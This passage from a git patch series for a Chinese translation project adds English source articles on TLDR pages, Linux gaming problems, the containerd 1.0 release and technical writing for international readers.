+[22]:https://www.pidgin.im/ +[23]:https://itsfoss.com/franz-messaging-app/ +[24]:http://rambox.pro/ +[25]:https://www.skype.com +[26]:https://itsfoss.com/skpe-alpha-linux/ +[27]:https://www.libreoffice.org +[28]:https://www.wps.com +[29]:http://gnumdk.github.io/lollypop-web/ +[30]:https://wiki.gnome.org/Apps/Rhythmbox +[31]:https://cmus.github.io/ +[32]:http://www.videolan.org +[33]:https://kodi.tv +[34]:https://www.gimp.org/ +[35]:https://krita.org/en/ +[36]:https://atom.io/ +[37]:http://www.sublimetext.com/ +[38]:https://github.com/ManuelSchneid3r/albert +[39]:https://launchpad.net/synapse-project +[40]:https://itsfoss.com/otter-browser-review/ +[41]:https://itsfoss.com/4-best-download-managers-for-linux/ +[42]:https://itsfoss.com/best-torrent-ubuntu/ +[43]:https://itsfoss.com/cloud-services-linux/ +[44]:https://itsfoss.com/best-messaging-apps-linux/ +[45]:https://itsfoss.com/best-free-open-source-alternatives-microsoft-office/ +[46]:https://itsfoss.com/install-tomahawk-ubuntu-1404-linux-mint-17/ +[47]:https://itsfoss.com/format-factory-alternative-linux/ +[48]:https://itsfoss.com/image-applications-ubuntu-linux/ +[49]:https://itsfoss.com/best-modern-open-source-code-editors-for-linux/ From 11f89a9b5da8f3d1a8ef40acc7db2932191ba36a Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 14:59:06 +0800 Subject: [PATCH 0433/1627] =?UTF-8?q?20171209-1=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...mplified Alternative To Linux Man Pages.md | 117 ++++++++++++++++++ 1 file changed, 117 insertions(+) create mode 100644 sources/tech/20171129 TLDR pages Simplified Alternative To Linux Man Pages.md diff --git a/sources/tech/20171129 TLDR pages Simplified Alternative To Linux Man Pages.md b/sources/tech/20171129 TLDR pages Simplified Alternative To Linux Man Pages.md new file mode 100644 index 0000000000..afa981df46 --- /dev/null +++ b/sources/tech/20171129 TLDR pages Simplified Alternative To Linux Man Pages.md @@ -0,0 +1,117 @@ +TLDR pages: Simplified Alternative To Linux Man Pages +============================================================ + + [![](https://fossbytes.com/wp-content/uploads/2017/11/tldr-page-ubuntu-640x360.jpg "tldr page ubuntu")][22] + + Working on the terminal and using various commands to carry out important tasks is an indispensable part of a Linux desktop experience. This open-source operating system possesses an [abundance of commands][23] that **makes** it impossible for any user to remember all of them. To make things more complex, each command has its own set of options to bring a wider set of functionality. + +To solve this problem, [Man Pages][12], short for manual pages, were created. First written in English, it contains tons of in-depth information about different commands. Sometimes, when you’re looking for just basic information on a command, it can also become overwhelming. To solve this issue,[ TLDR pages][13] was created. + + _Before going ahead and knowing more about it, don’t forget to check a few more terminal tricks:_ + +* _**[Watch Star Wars in terminal ][1]**_ + +* _**[Use StackOverflow in terminal][2]**_ + +* _**[Get Weather report in terminal][3]**_ + +* _**[Access Google through terminal][4]**_ + +* [**_Use Wikipedia from command line_**][7] + +* _**[Check Cryptocurrency Prices From Terminal][5]**_ + +* _**[Search and download torrent in terminal][6]**_ + +### What are TLDR pages? + +The GitHub page of TLDR pages for Linux/Unix describes it as a collection of simplified and community-driven man pages. It’s an effort to make the experience of using man pages simpler with the help of practical examples. For those who don’t know, TLDR is taken from common internet slang _ Too Long Didn’t Read_ . + +In case you wish to compare, let’s take the example of tar command. The usual man page extends over 1,000 lines. It’s an archiving utility that’s often combined with a compression method like bzip or gzip. Take a look at its man page: + + [![tar man page](https://fossbytes.com/wp-content/uploads/2017/11/tar-man-page.jpg)][14] On the other hand, TLDR pages lets you simply take a glance at the command and see how it works. Tar’s TLDR page simply looks like this and comes with some handy examples of the most common tasks you can complete with this utility: + + [![tar tldr page](https://fossbytes.com/wp-content/uploads/2017/11/tar-tldr-page.jpg)][15] Let’s take another example and show you what TLDR pages has to offer when it comes to apt: + + [![tldr-page-of-apt](https://fossbytes.com/wp-content/uploads/2017/11/tldr-page-of-apt.jpg)][16] Having shown you how TLDR works and makes your life easier, let’s tell you how to install it on your Linux-based operating system. + +### How to install and use TLDR pages on Linux? + +The most mature TLDR client is based on Node.js and you can install it easily using NPM package manager. In case Node and NPM are not available on your system, run the following command: + +``` +sudo apt-get install nodejs + +sudo apt-get install npm +``` + +In case you’re using an OS other than Debian, Ubuntu, or Ubuntu’s derivatives, you can use yum, dnf, or pacman package manager as per your convenience. + +Now, by running the following command in terminal, install TLDR client on your Linux machine: + +``` +sudo npm install -g tldr +``` + +Once you’ve installed this terminal utility, it would be a good idea to update its cache before trying it out. To do so, run the following command: + +``` +tldr --update +``` + +After doing this, feel free to read the TLDR page of any Linux command. To do so, simply type: + +``` +tldr +``` + + [![tldr kill command](https://fossbytes.com/wp-content/uploads/2017/11/tldr-kill-command.jpg)][17] + +You can also run the following help command to see all different parameters that can be used with TLDR to get the desired output. As usual, this help page is also accompanied with examples. + +### TLDR web, Android, and iOS versions + +You would be pleasantly surprised to know that TLDR pages isn’t limited to your Linux desktop. Instead, it can also be used in your web browser, which can be accessed from any machine. + +To use TLDR web version, visit [tldr.ostera.io][18] and perform the required search operation. + +Alternatively, you can also download the [iOS][19] and [Android][20] apps and keep learning new commands on the go. + + [![tldr app ios](https://fossbytes.com/wp-content/uploads/2017/11/tldr-app-ios.jpg)][21] + +Did you find this cool Linux terminal trick interesting? Do give it a try and let us know your feedback. + +-------------------------------------------------------------------------------- + +via: https://fossbytes.com/tldr-pages-linux-man-pages-alternative/ + +作者:[Adarsh Verma ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fossbytes.com/author/adarsh/ +[1]:https://fossbytes.com/watch-star-wars-command-prompt-via-telnet/ +[2]:https://fossbytes.com/use-stackoverflow-linux-terminal-mac/ +[3]:https://fossbytes.com/single-command-curl-wttr-terminal-weather-report/ +[4]:https://fossbytes.com/how-to-google-search-in-command-line-using-googler/ +[5]:https://fossbytes.com/check-bitcoin-cryptocurrency-prices-command-line-coinmon/ +[6]:https://fossbytes.com/review-torrench-download-torrents-using-terminal-linux/ +[7]:https://fossbytes.com/use-wikipedia-termnianl-wikit/ +[8]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Ffossbytes.com%2Ftldr-pages-linux-man-pages-alternative%2F +[9]:https://twitter.com/intent/tweet?text=TLDR+pages%3A+Simplified+Alternative+To+Linux+Man+Pages&url=https%3A%2F%2Ffossbytes.com%2Ftldr-pages-linux-man-pages-alternative%2F&via=%40fossbytes14 +[10]:http://plus.google.com/share?url=https://fossbytes.com/tldr-pages-linux-man-pages-alternative/ +[11]:http://pinterest.com/pin/create/button/?url=https://fossbytes.com/tldr-pages-linux-man-pages-alternative/&media=https://fossbytes.com/wp-content/uploads/2017/11/tldr-page-ubuntu.jpg +[12]:https://fossbytes.com/linux-lexicon-man-pages-navigation/ +[13]:https://github.com/tldr-pages/tldr +[14]:https://fossbytes.com/wp-content/uploads/2017/11/tar-man-page.jpg +[15]:https://fossbytes.com/wp-content/uploads/2017/11/tar-tldr-page.jpg +[16]:https://fossbytes.com/wp-content/uploads/2017/11/tldr-page-of-apt.jpg +[17]:https://fossbytes.com/wp-content/uploads/2017/11/tldr-kill-command.jpg +[18]:https://tldr.ostera.io/ +[19]:https://itunes.apple.com/us/app/tldt-pages/id1071725095?ls=1&mt=8 +[20]:https://play.google.com/store/apps/details?id=io.github.hidroh.tldroid +[21]:https://fossbytes.com/wp-content/uploads/2017/11/tldr-app-ios.jpg +[22]:https://fossbytes.com/wp-content/uploads/2017/11/tldr-page-ubuntu.jpg +[23]:https://fossbytes.com/a-z-list-linux-command-line-reference/ From 174c861b3feae93c61fe8a32bfc315f78d387a3c Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:05:40 +0800 Subject: [PATCH 0434/1627] =?UTF-8?q?20171209-2=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...eriences Every Linux Gamer Never Wanted.md | 159 ++++++++++++++++++ 1 file changed, 159 insertions(+) create mode 100644 sources/tech/20160922 Annoying Experiences Every Linux Gamer Never Wanted.md diff --git a/sources/tech/20160922 Annoying Experiences Every Linux Gamer Never Wanted.md b/sources/tech/20160922 Annoying Experiences Every Linux Gamer Never Wanted.md new file mode 100644 index 0000000000..8362f15d9b --- /dev/null +++ b/sources/tech/20160922 Annoying Experiences Every Linux Gamer Never Wanted.md @@ -0,0 +1,159 @@ +Annoying Experiences Every Linux Gamer Never Wanted! +============================================================ + + + [![Linux gamer's problem](https://itsfoss.com/wp-content/uploads/2016/09/Linux-Gaming-Problems.jpg)][10] + +[Gaming on Linux][12] has come a long way. There are dedicated [Linux gaming distributions][13] now. But this doesn’t mean that gaming experience on Linux is as smooth as on Windows. + +What are the obstacles that should be thought about to ensure that we enjoy games as much as Windows users do? + +[Wine][14], [PlayOnLinux][15] and other similar tools are not always able to play every popular Windows game. In this article, I would like to discuss various factors that must be dealt with in order to have the best possible Linux gaming experience. + +### #1 SteamOS is Open Source, Steam for Linux is NOT + +As stated on the [SteamOS page][16], even though SteamOS is open source, Steam for Linux continues to be proprietary. Had it also been open source, the amount of support from the open source community would have been tremendous! Since it is not, [the birth of Project Ascension was inevitable][17]: + +[video](https://youtu.be/07UiS5iAknA) + +Project Ascension is an open source game launcher designed to launch games that have been bought and downloaded from anywhere – they can be Steam games, [Origin games][18], Uplay games, games downloaded directly from game developer websites or from DVD/CD-ROMs. + +Here is how it all began: [Sharing The Idea][19] resulted in a very interesting discussion with readers all over from the gaming community pitching in their own opinions and suggestions. + +### #2 Performance compared to Windows + +Getting Windows games to run on Linux is not always an easy task. But thanks to a feature called [CSMT][20] (command stream multi-threading), PlayOnLinux is now better equipped to deal with these performance issues, though it’s still a long way to achieve Windows level outcomes. + +Native Linux support for games has not been so good for past releases. + +Last year, it was reported that SteamOS performed [significantly worse][21] than Windows. Tomb Raider was released on SteamOS/Steam for Linux last year. However, benchmark results were [not at par][22] with performance on Windows. + +[video](https://youtu.be/nkWUBRacBNE) + +This was much obviously due to the fact that the game had been developed with [DirectX][23] in mind and not [OpenGL][24]. + +Tomb Raider is the [first Linux game that uses TressFX][25]. This video includes TressFX comparisons: + +[video](https://youtu.be/-IeY5ZS-LlA) + +Here is another interesting comparison which shows Wine+CSMT performing much better than the native Linux version itself on Steam! This is the power of Open Source! + +[Suggested readA New Linux OS "OSu" Vying To Be Ubuntu Of Arch Linux World][26] + +[video](https://youtu.be/sCJkC6oJ08A) + +TressFX has been turned off in this case to avoid FPS loss. + +Here is another Linux vs Windows comparison for the recently released “[Life is Strange][27]” on Linux: + +[video](https://youtu.be/Vlflu-pIgIY) + +It’s good to know that  [_Steam for Linux_][28]  has begun to show better improvements in performance for this new Linux game. + +Before launching any game for Linux, developers should consider optimizing them especially if it’s a DirectX game and requires OpenGL translation. We really do hope that [Deus Ex: Mankind Divided on Linux][29] gets benchmarked well, upon release. As its a DirectX game, we hope it’s being ported well for Linux. Here’s [what the Executive Game Director had to say][30]. + +### #3 Proprietary NVIDIA Drivers + +[AMD’s support for Open Source][31] is definitely commendable when compared to [NVIDIA][32]. Though [AMD][33] driver support is [pretty good on Linux][34] now due to its better open source driver, NVIDIA graphic card owners will still have to use the proprietary NVIDIA drivers because of the limited capabilities of the open-source version of NVIDIA’s graphics driver called Nouveau. + +In the past, legendary Linus Torvalds has also shared his thoughts about Linux support from NVIDIA to be totally unacceptable: + +[video](https://youtu.be/O0r6Pr_mdio) + +You can watch the complete talk [here][35]. Although NVIDIA responded with [a commitment for better linux support][36], the open source graphics driver still continues to be weak as before. + +### #4 Need for Uplay and Origin DRM support on Linux + +[video](https://youtu.be/rc96NFwyxWU) + +The above video describes how to install the [Uplay][37] DRM on Linux. The uploader also suggests that the use of wine as the main tool of games and applications is not recommended on Linux. Rather, preference to native applications should be encouraged instead. + +The following video is a guide about installing the [Origin][38] DRM on Linux: + +[video](https://youtu.be/ga2lNM72-Kw) + +Digital Rights Management Software adds another layer for game execution and hence it adds up to the already challenging task to make a Windows game run well on Linux. So in addition to making the game execute, W.I.N.E has to take care of running the DRM software such as Uplay or Origin as well. It would have been great if, like Steam, Linux could have got its own native versions of Uplay and Origin. + +[Suggested readLinux Foundation Head Calls 2017 'Year of the Linux Desktop'... While Running Apple's macOS Himself][39] + +### #5 DirectX 11 support for Linux + +Even though we have tools on Linux to run Windows applications, every game comes with its own set of tweak requirements for it to be playable on Linux. Though there was an announcement about [DirectX 11 support for Linux][40] last year via Code Weavers, it’s still a long way to go to make playing newly launched titles on Linux a possibility. Currently, you can + +Currently, you can [buy Crossover from Codeweavers][41] to get the best DirectX 11 support available. This [thread][42] on the Arch Linux forums clearly shows how much more effort is required to make this dream a possibility. Here is an interesting [find][43] from a [Reddit thread][44], which mentions Wine getting [DirectX 11 patches from Codeweavers][45]. Now that’s definitely some good news. + +### #6 100% of Steam games are not available for Linux + +This is an important point to ponder as Linux gamers continue to miss out on every major game release since most of them land up on Windows. Here is a guide to [install Steam for Windows on Linux][46]. + +### #7 Better Support from video game publishers for OpenGL + +Currently, developers and publishers focus primarily on DirectX for video game development rather than OpenGL. Now as Steam is officially here for Linux, developers should start considering development in OpenGL as well. + +[Direct3D][47] is made solely for the Windows platform. The OpenGL API is an open standard, and implementations exist for not only Windows but a wide variety of other platforms. + +Though quite an old article, [this valuable resource][48] shares a lot of thoughtful information on the realities of OpenGL and DirectX. The points made are truly very sensible and enlightens the reader about the facts based on actual chronological events. + +Publishers who are launching their titles on Linux should definitely not leave out the fact that developing the game on OpenGL would be a much better deal than translating it from DirectX to OpenGL. If conversion has to be done, the translations must be well optimized and carefully looked into. There might be a delay in releasing the games but still it would definitely be worth the wait. + +Have more annoyances to share? Do let us know in the comments. + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/linux-gaming-problems/ + +作者:[Avimanyu Bandyopadhyay ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/avimanyu/ +[1]:https://itsfoss.com/author/avimanyu/ +[2]:https://itsfoss.com/linux-gaming-problems/#comments +[3]:https://www.facebook.com/share.php?u=https%3A%2F%2Fitsfoss.com%2Flinux-gaming-problems%2F%3Futm_source%3Dfacebook%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[4]:https://twitter.com/share?original_referer=/&text=Annoying+Experiences+Every+Linux+Gamer+Never+Wanted%21&url=https://itsfoss.com/linux-gaming-problems/%3Futm_source%3Dtwitter%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare&via=itsfoss2 +[5]:https://plus.google.com/share?url=https%3A%2F%2Fitsfoss.com%2Flinux-gaming-problems%2F%3Futm_source%3DgooglePlus%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[6]:https://www.linkedin.com/cws/share?url=https%3A%2F%2Fitsfoss.com%2Flinux-gaming-problems%2F%3Futm_source%3DlinkedIn%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[7]:http://www.stumbleupon.com/submit?url=https://itsfoss.com/linux-gaming-problems/&title=Annoying+Experiences+Every+Linux+Gamer+Never+Wanted%21 +[8]:https://www.reddit.com/submit?url=https://itsfoss.com/linux-gaming-problems/&title=Annoying+Experiences+Every+Linux+Gamer+Never+Wanted%21 +[9]:https://itsfoss.com/wp-content/uploads/2016/09/Linux-Gaming-Problems.jpg +[10]:https://itsfoss.com/wp-content/uploads/2016/09/Linux-Gaming-Problems.jpg +[11]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/09/Linux-Gaming-Problems.jpg&url=https://itsfoss.com/linux-gaming-problems/&is_video=false&description=Linux%20gamer%27s%20problem +[12]:https://itsfoss.com/linux-gaming-guide/ +[13]:https://itsfoss.com/linux-gaming-distributions/ +[14]:https://itsfoss.com/use-windows-applications-linux/ +[15]:https://www.playonlinux.com/en/ +[16]:http://store.steampowered.com/steamos/ +[17]:http://www.ibtimes.co.uk/reddit-users-want-replace-steam-open-source-game-launcher-project-ascension-1498999 +[18]:https://www.origin.com/ +[19]:https://www.reddit.com/r/pcmasterrace/comments/33xcvm/we_hate_valves_monopoly_over_pc_gaming_why/ +[20]:https://github.com/wine-compholio/wine-staging/wiki/CSMT +[21]:http://arstechnica.com/gaming/2015/11/ars-benchmarks-show-significant-performance-hit-for-steamos-gaming/ +[22]:https://www.gamingonlinux.com/articles/tomb-raider-benchmark-video-comparison-linux-vs-windows-10.7138 +[23]:https://en.wikipedia.org/wiki/DirectX +[24]:https://en.wikipedia.org/wiki/OpenGL +[25]:https://www.gamingonlinux.com/articles/tomb-raider-released-for-linux-video-thoughts-port-report-included-the-first-linux-game-to-use-tresfx.7124 +[26]:https://itsfoss.com/osu-new-linux/ +[27]:http://lifeisstrange.com/ +[28]:https://itsfoss.com/install-steam-ubuntu-linux/ +[29]:https://itsfoss.com/deus-ex-mankind-divided-linux/ +[30]:http://wccftech.com/deus-ex-mankind-divided-director-console-ports-on-pc-is-disrespectful/ +[31]:http://developer.amd.com/tools-and-sdks/open-source/ +[32]:http://nvidia.com/ +[33]:http://amd.com/ +[34]:http://www.makeuseof.com/tag/open-source-amd-graphics-now-awesome-heres-get/ +[35]:https://youtu.be/MShbP3OpASA +[36]:https://itsfoss.com/nvidia-optimus-support-linux/ +[37]:http://uplay.com/ +[38]:http://origin.com/ +[39]:https://itsfoss.com/linux-foundation-head-uses-macos/ +[40]:http://www.pcworld.com/article/2940470/hey-gamers-directx-11-is-coming-to-linux-thanks-to-codeweavers-and-wine.html +[41]:https://itsfoss.com/deal-run-windows-software-and-games-on-linux-with-crossover-15-66-off/ +[42]:https://bbs.archlinux.org/viewtopic.php?id=214771 +[43]:https://ghostbin.com/paste/sy3e2 +[44]:https://www.reddit.com/r/linux_gaming/comments/3ap3uu/directx_11_support_coming_to_codeweavers/ +[45]:https://www.codeweavers.com/about/blogs/caron/2015/12/10/directx-11-really-james-didnt-lie +[46]:https://itsfoss.com/linux-gaming-guide/ +[47]:https://en.wikipedia.org/wiki/Direct3D +[48]:http://blog.wolfire.com/2010/01/Why-you-should-use-OpenGL-and-not-DirectX From 6f6a7557613874113d530ba9429f9db383b83564 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:12:13 +0800 Subject: [PATCH 0435/1627] =?UTF-8?q?20171205-3=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...NDARD RUNTIME USED BY MILLIONS OF USERS.md | 102 ++++++++++++++++++ 1 file changed, 102 insertions(+) create mode 100644 sources/tech/20171205 ANNOUNCING THE GENERAL AVAILABILITY OF CONTAINERD 1.0 THE INDUSTRY-STANDARD RUNTIME USED BY MILLIONS OF USERS.md diff --git a/sources/tech/20171205 ANNOUNCING THE GENERAL AVAILABILITY OF CONTAINERD 1.0 THE INDUSTRY-STANDARD RUNTIME USED BY MILLIONS OF USERS.md b/sources/tech/20171205 ANNOUNCING THE GENERAL AVAILABILITY OF CONTAINERD 1.0 THE INDUSTRY-STANDARD RUNTIME USED BY MILLIONS OF USERS.md new file mode 100644 index 0000000000..80fe739969 --- /dev/null +++ b/sources/tech/20171205 ANNOUNCING THE GENERAL AVAILABILITY OF CONTAINERD 1.0 THE INDUSTRY-STANDARD RUNTIME USED BY MILLIONS OF USERS.md @@ -0,0 +1,102 @@ +ANNOUNCING THE GENERAL AVAILABILITY OF CONTAINERD 1.0, THE INDUSTRY-STANDARD RUNTIME USED BY MILLIONS OF USERS +============================================================ + +Today, we’re pleased to announce that containerd (pronounced Con-Tay-Ner-D), an industry-standard runtime for building container solutions, has reached its 1.0 milestone. containerd has already been deployed in millions of systems in production today, making it the most widely adopted runtime and an essential upstream component of the Docker platform. + +Built to address the needs of modern container platforms like Docker and orchestration systems like Kubernetes, containerd ensures users have a consistent dev to ops experience. From [Docker’s initial announcement][22] last year that it was spinning out its core runtime to [its donation to the CNCF][23] in March 2017, the containerd project has experienced significant growth and progress over the past 12 months. . + +Within both the Docker and Kubernetes communities, there has been a significant uptick in contributions from independents and CNCF member companies alike including Docker, Google, NTT, IBM, Microsoft, AWS, ZTE, Huawei and ZJU. Similarly, the maintainers have been working to add key functionality to containerd.The initial containerd donation provided everything users need to ensure a seamless container experience including methods for: + +* transferring container images, + +* container execution and supervision, + +* low-level local storage and network interfaces and + +* the ability to work on both Linux, Windows and other platforms.  + +Additional work has been done to add even more powerful capabilities to containerd including a: + +* Complete storage and distribution system that supports both OCI and Docker image formats and + +* Robust events system + +* More sophisticated snapshot model to manage container filesystems + +These changes helped the team build out a smaller interface for the snapshotters, while still fulfilling the requirements needed from things like a builder. It also reduces the amount of code needed, making it much easier to maintain in the long run. + +The containerd 1.0 milestone comes after several months testing both the alpha and version versions, which enabled the  team to implement many performance improvements. Some of these,improvements include the creation of a stress testing system, improvements in garbage collection and shim memory usage. + +“In 2017 key functionality has been added containerd to address the needs of modern container platforms like Docker and orchestration systems like Kubernetes,” said Michael Crosby, Maintainer for containerd and engineer at Docker. “Since our announcement in December, we have been progressing the design of the project with the goal of making it easily embeddable in higher level systems to provide core container capabilities. We will continue to work with the community to create a runtime that’s lightweight yet powerful, balancing new functionality with the desire for code that is easy to support and maintain.” + +containerd is already being used by Kubernetes for its[ cri-containerd project][24], which enables users to run Kubernetes clusters using containerd as the underlying runtime. containerd is also an essential upstream component of the Docker platform and is currently used by millions of end users. There is also strong alignment with other CNCF projects: containerd exposes an API using [gRPC][25] and exposes metrics in the [Prometheus][26] format. containerd also fully leverages the Open Container Initiative (OCI) runtime, image format specifications and OCI reference implementation ([runC][27]), and will pursue OCI certification when it is available. + +Key Milestones in the progress to 1.0 include: + +![containerd 1.0](https://i2.wp.com/blog.docker.com/wp-content/uploads/4f8d8c4a-6233-4d96-a0a2-77ed345bf42b-5.jpg?resize=720%2C405&ssl=1) + +Notable containerd facts and figures: + +* 1994 GitHub stars, 401 forks + +* 108 contributors + +* 8 maintainers from independents and and member companies alike including Docker, Google, IBM, ZTE and ZJU . + +* 3030+ commits, 26 releases + +Availability and Resources + +To participate in containerd: [github.com/containerd/containerd][28] + +* Getting Started with containerd: [http://mobyproject.org/blog/2017/08/15/containerd-getting-started/][8] + +* Roadmap: [https://github.com/containerd/containerd/blob/master/ROADMAP.md][1] + +* Scope table: [https://github.com/containerd/containerd#scope][2] + +* Architecture document: [https://github.com/containerd/containerd/blob/master/design/architecture.md][3] + +* APIs: [https://github.com/containerd/containerd/tree/master/api/][9]. + +* Learn more about containerd at KubeCon by attending Justin Cormack’s [LinuxKit & Kubernetes talk at Austin Docker Meetup][10], Patrick Chanezon’s [Moby session][11] [Phil Estes’ session][12] or the [containerd salon][13] + +-------------------------------------------------------------------------------- + +via: https://blog.docker.com/2017/12/cncf-containerd-1-0-ga-announcement/ + +作者:[Patrick Chanezon ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.docker.com/author/chanezon/ +[1]:https://github.com/docker/containerd/blob/master/ROADMAP.md +[2]:https://github.com/docker/containerd#scope +[3]:https://github.com/docker/containerd/blob/master/design/architecture.md +[4]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2ArQe3G&title=Announcing%20the%20General%20Availability%20of%20containerd%201.0%2C%20the%20industry-standard%20runtime%20used%20by%20millions%20of%20users&summary=Today,%20we%E2%80%99re%20pleased%20to%20announce%20that%20containerd%20(pronounced%20Con-Tay-Ner-D),%20an%20industry-standard%20runtime%20for%20building%20container%20solutions,%20has%20reached%20its%201.0%20milestone.%20containerd%20has%20already%20been%20deployed%20in%20millions%20of%20systems%20in%20production%20today,%20making%20it%20the%20most%20widely%20adopted%20runtime%20and%20an%20essential%20upstream%20component%20of%20the%20Docker%20platform.%20Built%20... +[5]:http://www.reddit.com/submit?url=http://dockr.ly/2ArQe3G&title=Announcing%20the%20General%20Availability%20of%20containerd%201.0%2C%20the%20industry-standard%20runtime%20used%20by%20millions%20of%20users +[6]:https://plus.google.com/share?url=http://dockr.ly/2ArQe3G +[7]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2ArQe3G&t=Announcing%20the%20General%20Availability%20of%20containerd%201.0%2C%20the%20industry-standard%20runtime%20used%20by%20millions%20of%20users +[8]:http://mobyproject.org/blog/2017/08/15/containerd-getting-started/ +[9]:https://github.com/docker/containerd/tree/master/api/ +[10]:https://www.meetup.com/Docker-Austin/events/245536895/ +[11]:http://sched.co/CU6G +[12]:https://kccncna17.sched.com/event/CU6g/embedding-the-containerd-runtime-for-fun-and-profit-i-phil-estes-ibm +[13]:https://kccncna17.sched.com/event/Cx9k/containerd-salon-hosted-by-derek-mcgowan-docker-lantao-liu-google +[14]:https://blog.docker.com/author/chanezon/ +[15]:https://blog.docker.com/tag/cloud-native-computing-foundation/ +[16]:https://blog.docker.com/tag/cncf/ +[17]:https://blog.docker.com/tag/container-runtime/ +[18]:https://blog.docker.com/tag/containerd/ +[19]:https://blog.docker.com/tag/cri-containerd/ +[20]:https://blog.docker.com/tag/grpc/ +[21]:https://blog.docker.com/tag/kubernetes/ +[22]:https://blog.docker.com/2016/12/introducing-containerd/ +[23]:https://blog.docker.com/2017/03/docker-donates-containerd-to-cncf/ +[24]:http://blog.kubernetes.io/2017/11/containerd-container-runtime-options-kubernetes.html +[25]:http://www.grpc.io/ +[26]:https://prometheus.io/ +[27]:https://github.com/opencontainers/runc +[28]:http://github.com/containerd/containerd From 6214048e86a6868299cee8c3c97f8c82a51b0c94 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:14:57 +0800 Subject: [PATCH 0436/1627] =?UTF-8?q?20171209-4=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...l Writing for an International Audience.md | 81 +++++++++++++++++++ 1 file changed, 81 insertions(+) create mode 100644 sources/tech/20171204 5 Tips to Improve Technical Writing for an International Audience.md diff --git a/sources/tech/20171204 5 Tips to Improve Technical Writing for an International Audience.md b/sources/tech/20171204 5 Tips to Improve Technical Writing for an International Audience.md new file mode 100644 index 0000000000..1b3ab61fb4 --- /dev/null +++ b/sources/tech/20171204 5 Tips to Improve Technical Writing for an International Audience.md @@ -0,0 +1,81 @@ +5 Tips to Improve Technical Writing for an International Audience +============================================================ + + +![documentation](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/typewriter-801921_1920.jpg?itok=faTXFNoE "documentation") +Writing in English for an international audience takes work; here are some handy tips to remember.[Creative Commons Zero][2] + +Writing in English for an international audience does not necessarily put native English speakers in a better position. On the contrary, they tend to forget that the document's language might not be the first language of the audience. Let's have a look at the following simple sentence as an example: “Encrypt the password using the 'foo bar' command.” + +Grammatically, the sentence is correct. Given that "-ing" forms (gerunds) are frequently used in the English language, most native speakers would probably not hesitate to phrase a sentence like this. However, on closer inspection, the sentence is ambiguous: The word “using” may refer either to the object (“the password”) or to the verb (“encrypt”). Thus, the sentence can be interpreted in two different ways: + +* Encrypt the password that uses the 'foo bar' command. + +* Encrypt the password by using the 'foo bar' command. + +As long as you have previous knowledge about the topic (password encryption or the 'foo bar' command), you can resolve this ambiguity and correctly decide that the second reading is the intended meaning of this sentence. But what if you lack in-depth knowledge of the topic? What if you are not an expert but a translator with only general knowledge of the subject? Or, what if you are a non-native speaker of English who is unfamiliar with advanced grammatical forms? + +### Know Your Audience + +Even native English speakers may need some training to write clear and straightforward technical documentation. Raising awareness of usability and potential problems is the first step. This article, based on my talk at[ Open Source Summit EU][5], offers several useful techniques. Most of them are useful not only for technical documentation but also for everyday written communication, such as writing email or reports. + +**1. Change perspective. **Step into your audience's shoes. Step one is to know your intended audience. If you are a developer writing for end users, view the product from their perspective. The [persona technique][6] can help to focus on the target audience and to provide the right level of detail for your readers. + +**2\. Follow the KISS principle. **Keep it short and simple. The principle can be applied to several levels, like grammar, sentences, or words. Here are some examples: + + _Words: _ Uncommon and long words slow down reading and might be obstacles for non-native speakers. Use simpler alternatives: + +“utilize” → “use” + +“indicate” → “show”, “tell”, “say” + +“prerequisite” → “requirement” + + _Grammar: _ Use the simplest tense that is appropriate. For example, use present tense when mentioning the result of an action: "Click  _OK_ . The  _Printer Options_  dialog appears.” + + _Sentences: _ As a rule of thumb, present one idea in one sentence. However, restricting sentence length to a certain amount of words is not useful in my opinion. Short sentences are not automatically easy to understand (especially if they are a cluster of nouns). Sometimes, trimming down sentences to a certain word count can introduce ambiquities, which can, in turn, make sentences even more difficult to understand. + +**3\. Beware of ambiguities. **As authors, we often do not notice ambiguity in a sentence. Having your texts reviewed by others can help identify such problems. If that's not an option, try to look at each sentence from different perspectives: Does the sentence also work for readers without in-depth knowledge of the topic? Does it work for readers with limited language skills? Is the grammatical relationship between all sentence parts clear? If the sentence does not meet these requirements, rephrase it to resolve the ambiguity. + +**4\. Be consistent. **This applies to choice of words, spelling, and punctuation as well as phrases and structure. For lists, use parallel grammatical construction. For example: + +Why white space is important: + +* It focuses attention. + +* It visually separates sections. + +* It splits content into chunks.  + +**5\. Remove redundant content.** Keep only information that is relevant for your target audience. On a sentence level, avoid fillers (basically, easily) and unnecessary modifications: + +"already existing" → "existing" + 